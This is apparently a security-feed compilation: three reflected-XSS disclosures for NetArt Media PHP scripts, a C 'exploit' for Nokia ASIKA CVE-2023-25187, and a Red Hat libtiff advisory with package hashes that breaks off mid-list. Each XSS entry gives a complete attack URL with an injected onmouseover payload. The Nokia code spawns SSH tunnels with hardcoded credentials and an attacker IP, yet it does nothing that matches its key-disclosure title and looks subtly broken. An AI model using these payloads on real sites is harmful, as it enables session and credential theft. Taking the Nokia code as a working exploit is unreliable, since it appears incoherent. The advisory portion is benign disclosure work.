PHP Mail version 5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/mall/                                          ││  Vendor   : NetArt Media                                                               ││  Software : PHP Mall 5.0                                                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1[-] Done

PHP Mall 5.0 Cross Site Scripting

Nokia ASIKA version 7.13.52 suffers from a hard-coded private key disclosure vulnerability.

    // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure// Date: 2023-06-20// Exploit Author: Amirhossein Bahramizadeh// Category : Hardware// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/// Version: 7.13.52 (REQUIRED)// Tested on: Windows/Linux// CVE : CVE-2023-25187#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/wait.h>#include <signal.h>// The IP address of the vulnerable devicechar *host = "192.168.1.1";// The default SSH port numberint port = 22;// The username and password for the BTS service user accountchar *username = "service_user";char *password = "password123";// The IP address of the attacker's machinechar *attacker_ip = "10.0.0.1";// The port number to use for the MITM attackint attacker_port = 2222;// The maximum length of a message#define MAX_LEN 1024// Forward data between two socketsvoid forward_data(int sock1, int sock2){    char buffer[MAX_LEN];    ssize_t bytes_read;    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)    {        write(sock2, buffer, bytes_read);    }}int main(){    int sock, pid1, pid2;    struct sockaddr_in addr;    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};    // Create a new socket    sock = socket(AF_INET, SOCK_STREAM, 0);    // Set the address to connect to    memset(&addr, 0, sizeof(addr));    addr.sin_family = AF_INET;    addr.sin_port = htons(port);    inet_pton(AF_INET, host, &addr.sin_addr);    // Connect to the vulnerable device    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)    {        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));        exit(1);    }    // Send the SSH handshake    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);    read(sock, NULL, 0);    // Send the username    write(sock, username, strlen(username));    write(sock, "\r\n", 2);    read(sock, NULL, 0);    // Send the password    write(sock, password, strlen(password));    write(sock, "\r\n", 2);    // Wait for the authentication to complete    sleep(1);    // Start an SSH client on the attacker's machine    pid1 = fork();    if (pid1 == 0)    {        execv("/usr/bin/ssh", argv);        exit(0);    }    // Start an SSH server on the attacker's machine    pid2 = fork();    if (pid2 == 0)    {        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);        exit(0);    }    // Wait for the SSH server to start    sleep(1);    // Forward data between the client and the server    pid1 = fork();    if (pid1 == 0)    {        forward_data(sock, STDIN_FILENO);        exit(0);    }    pid2 = fork();    if (pid2 == 0)    {        forward_data(STDOUT_FILENO, sock);        exit(0);    }    // Wait for the child processes to finish    waitpid(pid1, NULL, 0);    waitpid(pid2, NULL, 0);    // Close the socket    close(sock);    return 0;}

Nokia ASIKA 7.13.52 Private Key Disclosure

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

PHP Car Dealer 3.0 Cross Site Scripting

Talroo Jobs Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/talroo-jobs                                    ││  Vendor   : NetArt Media                                                               ││  Software : Talroo Jobs Script 1.0                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1[-] Done

Talroo Jobs Script 1.0 Cross Site Scripting

An update for libtiff is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-48281: A vulnerability was found in libtiff. This vulnerability occurs due to an issue in processCropSelections in the tools/tiffcrop.c function in LibTIFF that has a heap-based buffer overflow (for example, "WRITE of size 307203") via a crafted TIFF image.
* CVE-2023-0795: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds read in the extractContigSamplesShifted16bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited information disclosure.
* CVE-2023-0796: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds read in the extractContigSamplesShifted24bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited information disclosure.
* CVE-2023-0797: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds read in the _TIFFmemcpy function in libtiff/tif_unix.c when called by functions in tools/tiffcrop.c, resulting in a Denial of Service and limited information disclosure.
* CVE-2023-0798: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds read in the extractContigSamplesShifted8bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited information disclosure.
* CVE-2023-0799: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to a use-after-free problem in the extractContigSamplesShifted32bits function in tools/tiffcrop.c, resulting in a Denial of Service.
* CVE-2023-0800: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds write in the extractContigSamplesShifted16bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited data modification.
* CVE-2023-0801: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds write in the _TIFFmemcpy function in libtiff/tif_unix.c when called by functions in tools/tiffcrop.c, resulting in a Denial of Service and limited data modification.
* CVE-2023-0802: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds write in the extractContigSamplesShifted32bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited data modification.
* CVE-2023-0803: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds write in the extractContigSamplesShifted16bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited data modification.
* CVE-2023-0804: A flaw was found in tiffcrop, a program distributed by the libtiff package. A specially crafted tiff file can lead to an out-of-bounds write in the extractContigSamplesShifted24bits function in tools/tiffcrop.c, resulting in a Denial of Service and limited data modification.


**Red Hat Enterprise Linux for x86\_64 9**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

x86\_64

libtiff-4.4.0-8.el9\_2.i686.rpm

SHA-256: 687cae907762a6fc3c7df36bb288c90f2fde98f8ea18520ea683fb18dc06ed68

libtiff-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f6685ffdfcbd0dd088c8b5c9ab394811b27dd669b8fc4989376004dad279110f

libtiff-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: 2ee755827c1daf17196189d9d5d30f0acdbb527bc6baeca5f75b466778681691

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.i686.rpm

SHA-256: bf2809790db88c270f92582e718ab6d2f4f752692db3231818a04fbe42683cbc

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-devel-4.4.0-8.el9\_2.i686.rpm

SHA-256: a211a2360a7961764ff109b6e894f0fc230a990c4fa89e3b1f24b1d43697e0e6

libtiff-devel-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 84e939eecf0eacbd4bcb3bf46d0c0ed0c84f9d98eeb614a79d2aae60649a73d4

libtiff-tools-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: c7ff692b55cbefa1e2fbbb88eab8d41e0c1630694167843006084cb9b7b834d5

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

x86\_64

libtiff-4.4.0-8.el9\_2.i686.rpm

SHA-256: 687cae907762a6fc3c7df36bb288c90f2fde98f8ea18520ea683fb18dc06ed68

libtiff-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f6685ffdfcbd0dd088c8b5c9ab394811b27dd669b8fc4989376004dad279110f

libtiff-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: 2ee755827c1daf17196189d9d5d30f0acdbb527bc6baeca5f75b466778681691

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.i686.rpm

SHA-256: bf2809790db88c270f92582e718ab6d2f4f752692db3231818a04fbe42683cbc

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-devel-4.4.0-8.el9\_2.i686.rpm

SHA-256: a211a2360a7961764ff109b6e894f0fc230a990c4fa89e3b1f24b1d43697e0e6

libtiff-devel-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 84e939eecf0eacbd4bcb3bf46d0c0ed0c84f9d98eeb614a79d2aae60649a73d4

libtiff-tools-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: c7ff692b55cbefa1e2fbbb88eab8d41e0c1630694167843006084cb9b7b834d5

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat Enterprise Linux Server - AUS 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

x86\_64

libtiff-4.4.0-8.el9\_2.i686.rpm

SHA-256: 687cae907762a6fc3c7df36bb288c90f2fde98f8ea18520ea683fb18dc06ed68

libtiff-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f6685ffdfcbd0dd088c8b5c9ab394811b27dd669b8fc4989376004dad279110f

libtiff-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: 2ee755827c1daf17196189d9d5d30f0acdbb527bc6baeca5f75b466778681691

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.i686.rpm

SHA-256: bf2809790db88c270f92582e718ab6d2f4f752692db3231818a04fbe42683cbc

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-devel-4.4.0-8.el9\_2.i686.rpm

SHA-256: a211a2360a7961764ff109b6e894f0fc230a990c4fa89e3b1f24b1d43697e0e6

libtiff-devel-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 84e939eecf0eacbd4bcb3bf46d0c0ed0c84f9d98eeb614a79d2aae60649a73d4

libtiff-tools-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: c7ff692b55cbefa1e2fbbb88eab8d41e0c1630694167843006084cb9b7b834d5

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat Enterprise Linux for IBM z Systems 9**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

s390x

libtiff-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 85c061d39331a2e28033cfe0e70ec3f6894048244023f2c24e2397b537d3141a

libtiff-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 6102b0a2e0e6872b03b76963401063e43baefae933e239c0fcdd5a7324e27101

libtiff-debugsource-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 8ed17aa5538b765c2617edbe1d8d282b54b8f216e2271e254e46774d8a482e3b

libtiff-devel-4.4.0-8.el9\_2.s390x.rpm

SHA-256: fa1f43adef33de55498583000960b62dc89599acb3b60f16abc450eec7cd28da

libtiff-tools-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 116916837954756c6cb926ee3c7b589ece0bca96ca178d4a427a7c879068ace6

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

s390x

libtiff-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 85c061d39331a2e28033cfe0e70ec3f6894048244023f2c24e2397b537d3141a

libtiff-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 6102b0a2e0e6872b03b76963401063e43baefae933e239c0fcdd5a7324e27101

libtiff-debugsource-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 8ed17aa5538b765c2617edbe1d8d282b54b8f216e2271e254e46774d8a482e3b

libtiff-devel-4.4.0-8.el9\_2.s390x.rpm

SHA-256: fa1f43adef33de55498583000960b62dc89599acb3b60f16abc450eec7cd28da

libtiff-tools-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 116916837954756c6cb926ee3c7b589ece0bca96ca178d4a427a7c879068ace6

**Red Hat Enterprise Linux for Power, little endian 9**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

ppc64le

libtiff-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 79a4c8e2561fdeee2ba39a59bd980ea06e42e2c58c6c2811304f6e4dee3b3193

libtiff-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 7f253da209153598ad3f85b9e81c3b43ad2b402244a9847020e1d2d95be9e535

libtiff-debugsource-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: caded15d0d8c1d39f3519f04d2168619a5292d5adafc2650c1996f4683666a11

libtiff-devel-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: de485f3dbce27d4c999f0b5b368dd1710e2e66056cefda36edaef18f44de40a6

libtiff-tools-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 9cb9581152dafd784a03157129881298a3b6e03bff334d2cb58977cf53072d9b

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

ppc64le

libtiff-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 79a4c8e2561fdeee2ba39a59bd980ea06e42e2c58c6c2811304f6e4dee3b3193

libtiff-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 7f253da209153598ad3f85b9e81c3b43ad2b402244a9847020e1d2d95be9e535

libtiff-debugsource-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: caded15d0d8c1d39f3519f04d2168619a5292d5adafc2650c1996f4683666a11

libtiff-devel-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: de485f3dbce27d4c999f0b5b368dd1710e2e66056cefda36edaef18f44de40a6

libtiff-tools-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 9cb9581152dafd784a03157129881298a3b6e03bff334d2cb58977cf53072d9b

**Red Hat Enterprise Linux for ARM 64 9**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

aarch64

libtiff-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 276d4da81075b8050887a68d87cf469abd5f1ed795adbeec04e80a79ddd1fb1d

libtiff-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: aa65c6e39431666d6e37bed633dcb60c34b97c0990bf81ae8aecf95fc582b2a1

libtiff-debugsource-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e186fd0be8fc030963ba5b9eda54a45ca2b63bc1f8e3d9ebe43263e18bfe83cb

libtiff-devel-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 9eda7801b31905db1d7c5ac8534c7185d74f1bb738c916383958b523eb4f67a2

libtiff-tools-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e7fc135bf22a69992c66944ff53ccbabc260597db46a61d0bf6ddccaff4a46e6

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

ppc64le

libtiff-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 79a4c8e2561fdeee2ba39a59bd980ea06e42e2c58c6c2811304f6e4dee3b3193

libtiff-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 7f253da209153598ad3f85b9e81c3b43ad2b402244a9847020e1d2d95be9e535

libtiff-debugsource-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: caded15d0d8c1d39f3519f04d2168619a5292d5adafc2650c1996f4683666a11

libtiff-devel-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: de485f3dbce27d4c999f0b5b368dd1710e2e66056cefda36edaef18f44de40a6

libtiff-tools-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 9cb9581152dafd784a03157129881298a3b6e03bff334d2cb58977cf53072d9b

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

x86\_64

libtiff-4.4.0-8.el9\_2.i686.rpm

SHA-256: 687cae907762a6fc3c7df36bb288c90f2fde98f8ea18520ea683fb18dc06ed68

libtiff-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f6685ffdfcbd0dd088c8b5c9ab394811b27dd669b8fc4989376004dad279110f

libtiff-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: 2ee755827c1daf17196189d9d5d30f0acdbb527bc6baeca5f75b466778681691

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.i686.rpm

SHA-256: bf2809790db88c270f92582e718ab6d2f4f752692db3231818a04fbe42683cbc

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-devel-4.4.0-8.el9\_2.i686.rpm

SHA-256: a211a2360a7961764ff109b6e894f0fc230a990c4fa89e3b1f24b1d43697e0e6

libtiff-devel-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 84e939eecf0eacbd4bcb3bf46d0c0ed0c84f9d98eeb614a79d2aae60649a73d4

libtiff-tools-debuginfo-4.4.0-8.el9\_2.i686.rpm

SHA-256: c7ff692b55cbefa1e2fbbb88eab8d41e0c1630694167843006084cb9b7b834d5

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat CodeReady Linux Builder for x86\_64 9**

SRPM

x86\_64

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-tools-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 9fe75a837addcbf0b0e37f3f0c9a3cff91de826d63d567077888d59e4417181a

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat CodeReady Linux Builder for Power, little endian 9**

SRPM

ppc64le

libtiff-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 7f253da209153598ad3f85b9e81c3b43ad2b402244a9847020e1d2d95be9e535

libtiff-debugsource-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: caded15d0d8c1d39f3519f04d2168619a5292d5adafc2650c1996f4683666a11

libtiff-tools-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: e28226834f405403974722cdbdbb18d59a506afb7a79e9f272a4b4c27119a747

libtiff-tools-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 9cb9581152dafd784a03157129881298a3b6e03bff334d2cb58977cf53072d9b

**Red Hat CodeReady Linux Builder for ARM 64 9**

SRPM

aarch64

libtiff-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: aa65c6e39431666d6e37bed633dcb60c34b97c0990bf81ae8aecf95fc582b2a1

libtiff-debugsource-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e186fd0be8fc030963ba5b9eda54a45ca2b63bc1f8e3d9ebe43263e18bfe83cb

libtiff-tools-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 952366c2894732584e76f162dc30fe0c05e34013b7350bac7e1f34ec7c70fd97

libtiff-tools-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e7fc135bf22a69992c66944ff53ccbabc260597db46a61d0bf6ddccaff4a46e6

**Red Hat CodeReady Linux Builder for IBM z Systems 9**

SRPM

s390x

libtiff-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 6102b0a2e0e6872b03b76963401063e43baefae933e239c0fcdd5a7324e27101

libtiff-debugsource-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 8ed17aa5538b765c2617edbe1d8d282b54b8f216e2271e254e46774d8a482e3b

libtiff-tools-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 4556cd54304759d94f1a77fad15139e00e10386150af145d954fd1966518ae40

libtiff-tools-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 116916837954756c6cb926ee3c7b589ece0bca96ca178d4a427a7c879068ace6

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

aarch64

libtiff-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 276d4da81075b8050887a68d87cf469abd5f1ed795adbeec04e80a79ddd1fb1d

libtiff-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: aa65c6e39431666d6e37bed633dcb60c34b97c0990bf81ae8aecf95fc582b2a1

libtiff-debugsource-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e186fd0be8fc030963ba5b9eda54a45ca2b63bc1f8e3d9ebe43263e18bfe83cb

libtiff-devel-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 9eda7801b31905db1d7c5ac8534c7185d74f1bb738c916383958b523eb4f67a2

libtiff-tools-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e7fc135bf22a69992c66944ff53ccbabc260597db46a61d0bf6ddccaff4a46e6

**Red Hat CodeReady Linux Builder for x86\_64 - Extended Update Support 9.2**

SRPM

x86\_64

libtiff-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 269b149dfd74ab6983d0ff1ac4256b3dd83136c00328cbba06781a9a549414f4

libtiff-debugsource-4.4.0-8.el9\_2.x86\_64.rpm

